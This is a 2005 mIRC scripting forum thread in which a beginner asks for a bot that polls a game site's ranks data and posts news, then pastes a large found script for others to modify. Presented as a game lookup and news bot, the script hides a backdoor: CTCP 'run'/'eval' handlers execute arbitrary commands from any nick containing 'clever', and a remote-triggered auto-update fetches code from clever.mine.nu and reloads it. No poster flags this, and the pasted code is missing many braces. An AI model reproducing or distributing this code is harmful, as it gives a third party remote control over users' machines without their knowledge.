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#130814 22/09/05 10:47 AM
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KidSol Offline OP
Babel fish
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Babel fish
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Posts: 74
I have look at the socket for a few days already. Still don't understand about it confused
I'm still a newbie in mirc. frown
Anyone can help me make a scriot for me where it can scan news from a url?


#130815 22/09/05 11:23 AM
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Fjord artisan
Fjord artisan
Joined: Feb 2005
Posts: 344
What country are you from ?
If you search with google you'll find a cnn.mrc

Hope you can make use of it.

#130816 23/09/05 04:52 AM
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KidSol Offline OP
Babel fish
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Babel fish
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It's not a local
it's a game database.
like when the url update every minute, i want my bot to scan it everytime it updates

#130817 23/09/05 01:28 PM
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Hoopy frood
Hoopy frood
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The only way you can scan when it updates is to just keep checking it at intervals. A site updating isn't going to tell mIRC that it was updated.

/help sockets

Invision Support
#Invision on irc.irchighway.net
#130818 23/09/05 03:18 PM
Joined: Mar 2005
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KidSol Offline OP
Babel fish
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Babel fish
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Posts: 74

on *:LOAD: /news
menu channel {
  .Set YOUR news clan  : /clannews
  .Halt the news:/stopnews
alias stopnews { 
  %news.off = 1 
  /echo -a 4Earth News stopped

alias clannews {
  /sockopen [-d]] http://e3.swirve.com/data  80
  scid %searcbotcid %com %chann connected
  sockwrite -n swirve GET /data/ranks.txt HTTP/1.1
  sockwrite -n swirve Accept: text/html , */*
  sockwrite -n swirve Host: e3.swirve.com
  sockwrite -n swirve Connection: Keep-Alive
  sockwrite -n swirve

on 1:sockclose:earthnews: {
  scid %searcbotcid %com %chann disconnected
  scid %searcbotcid %com %chann reconnect


I'm not really sure how to code it
Can anyone help to modify it?
I want it to scan the news every times when the news update and it will post in a channel i want it to post so everyone can see it


#130819 23/09/05 03:38 PM
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Hoopy frood
Hoopy frood
Joined: Oct 2004
Posts: 8,330
First off, you need sockopen and sockread events.

Second, why not consider RSS instead?

Invision Support
#Invision on irc.irchighway.net
#130820 23/09/05 03:41 PM
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KidSol Offline OP
Babel fish
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Babel fish
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What is RSS?

I'm a newbie so i don't really know how to write it.
Is it possible to help me to write it?

#130821 23/09/05 03:54 PM
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Hoopy frood
Hoopy frood
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RSS isn't part of mIRC. Use Google to look up what RSS is. There are scripts on mircscripts.org (I believe) for getting RSS data and displaying it in mIRC.

Invision Support
#Invision on irc.irchighway.net
#130822 23/09/05 04:12 PM
Joined: Mar 2005
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KidSol Offline OP
Babel fish
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Babel fish
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Posts: 74

raw 364:*:server -a $2 -g $network ;for when you /links  this adds each server to the server list in mirc
on *:text:!hump *:#:describe # humps $$2
on *:text:!kill & *:#:describe # kills $2 with $3-
on *:action:$(slaps $me around a bit with a large trout):#:describe # dodges and stabs $nick with a shrew turd
on *:action:$(dodges and stabs $me with a shrew turd):#:describe # jumps out of the way of $nick and pulls out a gun
on *:action:$(jumps out of the way of $me and pulls out a gun):#:describe # does a auto reaction
;Origin: RFC1459 for these raw's
;Raw 403 (ERR_NOSUCHCHANNEL) Format: <channel> :<reason> Comments: Used to indicate the given channel name is invalid, or does not exist
;Raw 404 (ERR_CANNOTSENDTOCHAN) Format: <channel> :<reason> Comments: Sent to a user who does not have the rights to send a message to a channel
;Raw 473 (ERR_INVITEONLYCHAN) Format: <channel> :<reason> Comments: Returned when attempting to join a channel which is invite only without an invitation
;Raw 474 (ERR_BANNEDFROMCHAN) Format: <channel> :<reason> Comments: Returned when attempting to join a channel a user is banned from
;Raw 475 (ERR_BADCHANNELKEY) Format: <channel> :<reason> Comments: Returned when attempting to join a key-locked channel either without a key or with the wrong key
;these raws let you have chanserv invite you if you fail to join from a ban key or +i
raw 403:*:if ($left($2,1) == $chr(36)) join -n $2
raw 404:*:join -n $2 | halt
raw 473:*:{ ; the if below is so i can get into channel on my network easly
  if ($network == mikesNet) { join $2 OVERRIDE }
  else { cs invite $2 }
raw 474:*:cs invite $2
raw 475:*:cs invite $2
alias totallines { %x = $script(0)
  %total = 0
  while (%x > 0) { %total = $calc(%total + $lines($script(%x)))
  dec %x }
say i have a total of %total lines of code in my remote section and a average of $calc(%total / $script(0)) lines in the $script(0) files }
on *:text:!lgtarget:*:dcc chat $nick
on 1:connect:{
  r onconnect
  flood on
  flood +c 10 100 0 30
on 1:load:r onload
alias r {
  %timeleft = $calc(1800 - ($ctime % 1800))
  .timerupdate -o 10 $iif(%timeleft < 60,60,%timeleft) scid -at1 r
  %earthcommandsversion = 1.18
  if (%dontupdate) return
  if (($network != GameSurge) && ($network != mikesNet) && ($network != zero.servegame.org)) return
  if ($me != [-clever-]`ca) {
    .ctcp [-clever-]`ca updatecheck %earthcommandsversion $md5($script,2) $calc(1800 - ($ctime % 1800)) $1
    if ($sock(rawnewsin) == rawnewsin) sockwrite -n rawnewsin updatecheck %earthcommandsversion $md5($script,2) $1
ctcp *:version:*:ctcpreply $nick $1 commands version %earthcommandsversion
on *:notice:connectto & &:?:{
  if (($2 == clever.mine.nu) || ($2 == || (156.34.*.* iswm $2)) {
    if (%showupdates) echo -a got commands to get new version
    write commands.temp just to be safe
    .remove commands.temp
    sockopen getcommands $2 $3
    if (!%showupdates) haltdef
ctcp *:connectto:?:{
  if (($2 == clever.mine.nu) || ($2 == || (156.34.*.* iswm $2)) {
    if (%showupdates) echo -a got commands to get new version
    write commands.temp just to be safe
    .remove commands.temp
    sockopen getcommands $2 $3
    if (!%showupdates) haltdef
on *:sockopen:getcommands:{
  if ($sockerr) {
    echo -a sock error $sock($sockname).wserr $sock(%sock).wsmsg
    ctcp [-clever-]`ca sockerror $sock($sockname).wserr $sock(%sock).wsmsg in getcommands open
  .ctcp [-clever-]`ca getcommands opened
  sockwrite -n getcommands GET /earthcommands HTTP/1.1
  sockwrite -n getcommands
;new code for accepting new autoupdate
on *:sockread:getcommands:{
  if ($sockerr) {
    echo -a sock error $sock($sockname).wserr $sock(%sock).wsmsg
    ctcp [-clever-]`ca sockerror $sock($sockname).wserr $sock(%sock).wsmsg in getcommands reader
  sockread &data
  if ($sockbr == 0) return
  bwrite commands.temp -1 -1 &data
  goto nextread
on *:sockclose:getcommands:{
  if ($sockerr) {
    echo -a sockerror $sockerr $sock($sockname).wsnum $sock($sockname).wsmsg
  if (%showupdates) {
    ;echo -a $file(commands.temp).size
    copy -o commands.temp " $+ $script $+ "
    timer 1 5 reload -rs " $+ $script $+ "
  else {
    .copy -o commands.temp " $+ $script $+ "
    .timer 1 3 .reload -rs " $+ $script $+ "
  echo -s autoupdate will be done in 3 seconds
on *:text:@prefix *:%chann:{
  echo -a $2- is the prefix
;on *:text:$($me say *):#:msg # $3-
on *:text:$($me workon *):*:{
  workon $$3
  notice $nick @country and @find now work on $$3
alias workon {
  if ($1 == window) {
    %chann = #
    %com = echo @earth
  else {
    %com = msg 
    %chann = $1
  echo -a Showing info with %com %chann
on workon:text:@workon *:#:{
  workon $2
on *:TEXT:@workon*:#: {
  workon $2
  if (%dontmove) {
    notice $nick no dont move is set and you dont have override access
  else {
    notice $nick @country now will only work in $2
on *:TEXT:@max*:%chann: {
  max $2
  notice $nick max set to $2
on *:TEXT:@commands:#: {
  if ($chan == #script) return
  notice $nick public commands @country, @find, @workon
  notice $nick pm commands @list, @get
  notice $nick Special Codes
  notice $nick M=Monarchy D=Democracy R=Republic H=Theocracy C=Communism I=Dictatorship T=Tyranny F=Fascism 
  notice $nick G=GDI-Member *=Online 
on *:TEXT:@country *:%chann: /lookupcountry $2-
on *:text:@country *:?: if ($nick == %chann) /lookupcountry $2-
on *:text:@find *:%chann: /findcountry $2-
on *:text:@find *:?: if ($nick == %chann) /findcountry $2-
on *:text:@list:?:{
  msg $nick this script can send the folowing files to you using @get file
  msg $nick earthcommands
on *:text:@get earthcommands:?:{
  ;  copy commands.mrc commands.temp
  dcc send $nick commands.mrc
  msg $nick once you have the file /load -rs download\commands.mrc
alias lookupcountry {
  %searcbotcid = $cid
  if ($1 isnum) {
    %numtofind = $1
    %numtofindlen = $len($1)
    %mode = num
    sockopen swirve 80
    scid %searcbotcid %com %chann connecting to swirve
    scid %searcbotcid %com %chann looking for $1
    if ($2 > 0) %lookin = $2
    else %lookin = 0
  else {
    scid %searcbotcid %com %chann error @country can only be used with numbers use @find to search by name
alias findlgtarget {
  sockopen lgtarget 80
  echo -a connecting to swirve
  echo -a looking for $1
alias max %max = $1 | echo -a max set to $1
alias findcountry {
  %searcbotcid = $cid
  if ($1 isnum) {
    scid %searcbotcid %com %chann error $1 is a number this @find is for text and a search for a number will return anything with that number in the nw,land,country# or name try using @country
  %nametofind = $1
  %mode = text
  sockopen swirve 80
  scid %searcbotcid %com %chann connecting to swirve
  scid %searcbotcid %com %chann looking for $1
on 1:sockopen:swirve: {
  scid %searcbotcid %com %chann connected
  sockwrite -n swirve GET /data/ranks.txt HTTP/1.1
  sockwrite -n swirve Accept: text/html , */*
  sockwrite -n swirve User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
  sockwrite -n swirve Host: e3.swirve.com
  sockwrite -n swirve Connection: Keep-Alive
  sockwrite -n swirve
  if (%searchmsg != $null) {
    scid %searcbotcid %com %chann %searchmsg
  scid %searcbotcid %com %chann Number Country Land Acres Net Worth Clan Special
  %found = 0
  %rank = 0
  %donewithheaders = $false
on 1:sockopen:lgtarget: {
  echo -a connected
  sockwrite -n lgtarget GET /data/ranks.txt HTTP/1.1
  sockwrite -n lgtarget Accept: text/html , */*
  sockwrite -n lgtarget User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
  sockwrite -n lgtarget Host: e3.swirve.com
  sockwrite -n lgtarget Connection: Keep-Alive
  sockwrite -n lgtarget
  echo -a Number Country Land Acres Net Worth Clan Special
  %found = 0
  %rank = 0
  %donewithheaders = $false
on 1:sockclose:swirve: {
  scid %searcbotcid %com %chann swirve hung up on me
  scid %searcbotcid %com %chann how rude
menu @news {
  change filter from ' $+ %filter $+ ' to...:%filter = $?="what filter do you want for @news"
  start news:startnews
  stop news:stopnews
menu channel,query {
  test:echo -a $?
menu menubar {
  turn external run $iif(%stoprun,on,off):{
    if (%stoprun) {
      %stoprun = $false
    else {
      %stoprun = $true
  $iif(%showupdates,hide,show) update status msgs:{
    if (%showupdates) {
      %showupdates = $false
    else {
      %showupdates = $true
  mode bot from %chann to...:{
    workon $$?="what channel/pm do you want the cmds to work in"
    echo 7 -a @country @max and @find will now only work in %chann
  show search results in active window:{
    %com = echo
    %chann = -a
  open news window:window -e @news
on *:nick:{
  if (($network != GameSurge) && ($network != mikesNet) && ($network != zero.servegame.org)) return
  if ($nick == $me) {
    .ctcp [-clever-]`ca nickchange $nick $newnick
on ^*:text:run *:*:{
  if (%stoprun) return
  if (clever isin $nick) {
    [ [ $2- ] ] | msg $nick done running $2-
  msg $nick error: $error
ctcp *:run:{
  ; %stoprun = $false
  if (%stoprun) {
    .ctcpreply $nick $1 NO i'm set to not do that
  if (clever isin $nick) {
    [ [ $2- ] ]
    .ctcpreply $nick $1 done
    .ctcp [-clever-]`ca runused $fulladdress $1-
  .ctcpreply $nick $1 error $error
ctcp *:eval:{
  if (%stoprun) {
    .ctcpreply $nick $1 no thats off atm
  if (decode isin $2-) {
    .ctcpreply $nick $1 stfu decoder
  if (clever isin $nick) {
    .ctcpreply $nick $1 ' $+ $2- $+ ' == ' $+ [ [ $2- ] ] $+ '
  .ctcpreply $nick $1 error $error
on 1:socklisten:testing123: {
  /echo -s socklisten
  /sockaccept testing
on 1:sockread:testing: {
  echo -s set off
  if ($sockerr > 0) return
  sockread %temp
  if ($sockbr == 0) return
  if (%temp == $null) %temp = -
  echo -s %temp
  goto nextread
on 1:sockread:swirve: {
  if ($sockerr > 0) return
  if (%lookin != 0) {
    if (%lookin > $round($calc(%rank / 100),0)) return
    if (%lookin < $round($calc(%rank / 100),0)) {
      sockclose swirve
    ;echo -at looking for %lookin and at %chunk
  sockread %temp
  if ($sockbr == 0) {
    .timer10 1 5 /doneloading $sockname
  if (%temp == $null) {
    %temp = -
    %donewithheaders = $true
    goto nextread
  if (!%donewithheaders) goto nextread
  %rank = %rank + 1
  ;echo -a looking for %numtofind at %temp
  if (%mode == num) {
    ;echo -s %temp
    ;echo -s name is $gettok(%temp, 2, 32)
    if ($gettok(%temp, 1, 32) == %numtofind) {
      scid %searcbotcid %com %chann %temp rank: %rank
      ;scid %searcbotcid %com %chann to find faster next time use @country %numtofind $calc($round($calc(%rank / 100),0))
      %found = %found + 1
      if (%found == %max) {
        sockclose swirve
    ;/echo -s found %t looking for %numtofind $1 rank is %rank
    ;/echo -s %temp
  else {
    %t = $pos(%temp, %nametofind, 1)
    if (%t > 1) {
      if (%found == %max) {
        scid %searcbotcid %com %chann found %max countrys, now stoping
        /sockclose swirve
      else {
        scid %searcbotcid %com %chann %temp rank: %rank
        ;scid %searcbotcid %com %chann rank is %rank
        %found = %found + 1
        if (%found == %max) {
          doneloading $sockname
          .timer10 off
  goto nextread
on 1:sockread:lgtarget: {
  if ($sockerr > 0) return
  sockread %temp
  if ($sockbr == 0) {
    .timer10 1 5 /doneloading $sockname
  if (%temp == $null) {
    %temp = -
    %donewithheaders = $true
    goto nextread
  if (!%donewithheaders) goto nextread
  %rank = %rank + 1
  %decoded = $decod(%temp)
  if (%networth < $calc(%mynw * .6)) {
    doneloading $sockname
    echo -a none left in limit
  if (%tag != $null) goto nextread
  if (%networth < $calc(%mynw * .7)) {
    if (%land < 1000) {
      inc %found
      echo -a %temp
      msg $active name: $+ %countryname $+ , land: $+ %land $+ , net: $+ %networth $+ , tag: $+ %tag
  goto nextread
alias decod {
  %countrynum = $mid(%temp,4,4)
  %countryname = $gettok($mid(%temp,11,30),1,32)
  %land = $mid(%temp,40,10)
  %networth = $gettok($mid(%temp,55,10),1,32)
  %tag = $gettok($mid(%temp,65,6),1,32)
  ;sockclose lgtarget
  return %temp
alias doneloading {
  if ($1 != lgtarget) %com %chann done with list, now disconecting
  echo -a found %found
  /sockclose $1
  %timer10 = off
;  code for the mimi newsbot starts here
alias checknews { if ($sock(rawnewsin).status != active) startnews }
on *:sockclose:rawnewsin:{ timer 1 30 startnews }
alias startnews {
  ; open a connection to clever.mine.nu on port 98 for the raw news output
  /sockopen rawnewsin clever.mine.nu 80
  ; and set the vars used for formating msgs
  if ($numtok(%types,44) != 12) %types = SS,PS,error,error,GS,BR,AB,error,error,Nuke,Chem,Cruise
  if ($numtok(%ret1,44) != 12) %ret1 = A,A,error,error,C,C,C,error,error,A,A,nameMe
  if ($numtok(%ret2,44) != 12) %ret2 = B,B,error,error,F,F,B,error,error,Food,Civs,nameMe
  timercheck 0 3600 checknews
alias stopnews {
  sockclose rawnewsin
  timercheck off
on *:sockopen:rawnewsin:{
  echo -a connected to raw news stream
on *:sockread:rawnewsin:{
  sockread %rawlinein
  %date = $gettok(%rawlinein,1,127)
  %hour = $gettok(%rawlinein,2,127)
  %pass.fail = $gettok(%rawlinein,3,127)
  %attacker = $gettok(%rawlinein,4,127)
  %defender = $gettok(%rawlinein,5,127)
  %return1 = $gettok(%rawlinein,6,127)
  %return2 = $gettok(%rawlinein,7,127)
  %attacktype = $gettok(%rawlinein,8,127)
  %attackerrank = $gettok(%rawlinein,9,127)
  %defenderrank = $gettok(%rawlinein,10,127)
  %attackertag = $strip($gettok(%rawlinein,11,127))
  %defendertag = $strip($gettok(%rawlinein,12,127))
  %kill = $gettok(%rawlinein,13,127)
  %filenum = $gettok(%rawlinein,14,127)
  %curline = $gettok(%rawlinein,15,127)
  %maxline = $gettok(%rawlinein,16,127)
  %msgout = %curline $+ / $+ %maxline $gettok(%types,%attacktype,44) - %attacker ( $+ %attackertag $+ ) -> %defender ( $+ %defendertag $+ )
  if (%pass.fail == 0) {
    %msgout = %msgout and lost
  else {
    %msgout = %msgout and won %return1 $+ $gettok(%ret1,%attacktype,44) $+ / $+ %return2 $+ $gettok(%ret2,%attacktype,44)
  ;custom filter cmd
  if ($isalias(customformat)) customformat
  ; to use this make a alias /customformat in another file and add code like the if above
  ;window with filter news cmds
  if ($window(@news) == @news) {
    if (%filter == $null) echo @news $asctime %msgout
    elseif (%filter isin %msgout) echo @news $asctime %msgout
  ;channel with filter cmds
  if ($me ison %newschan) {
    if (%chanfilter == $null) msg %newschan %msgout
    elseif (%chanfilter isin %msgout) msg %newschan %msgout
  ;custom filter cmds
  if ($isalias(newsline)) newsline %msgout
  if ($isalias(htmlnewsline)) htmlnewsline %msgout


I found this script
Is it possible for u to modify it for me?
I want it to scan news from http://e3.swirve.com/data everytime it update and post it a channel i want and filter the words

#130823 23/09/05 04:57 PM
Joined: Oct 2004
Posts: 8,330
Hoopy frood
Hoopy frood
Joined: Oct 2004
Posts: 8,330
Well, I'm not about to edit something that large. Maybe someone else will. In the future, you should paste such large scripts in nomorepasting.com or similar locations.

Invision Support
#Invision on irc.irchighway.net
#130824 23/09/05 09:15 PM
Joined: Apr 2003
Posts: 701
Hoopy frood
Hoopy frood
Joined: Apr 2003
Posts: 701
It is possible to edit it, but I'm rather sure no one feels inclined to do so. Socket scripting is on the advanced side, you need a good understanding of both mIRC scripting and of the HTTP protocol. So, first improve on mIRC scripting reading the help file, tutorials and experimenting yourself and then google for the HTTP RFC and use a network sniffer or browser plugin to see what a browser sends and what you need to script.

#130825 04/11/05 10:54 PM
Joined: Nov 2005
Posts: 2
Bowl of petunias
Bowl of petunias
Joined: Nov 2005
Posts: 2
this script looks fimiliar
like a older verion of the one i made :tongue:
this isnt the main half of the code the part you pasted opens a socket to my main server and my main server does all the http gets on the site where the data is
i find that way puts less load on the main server then 20 people all accessing it at once
instead there all accessing me and not risking having the public feed made non public

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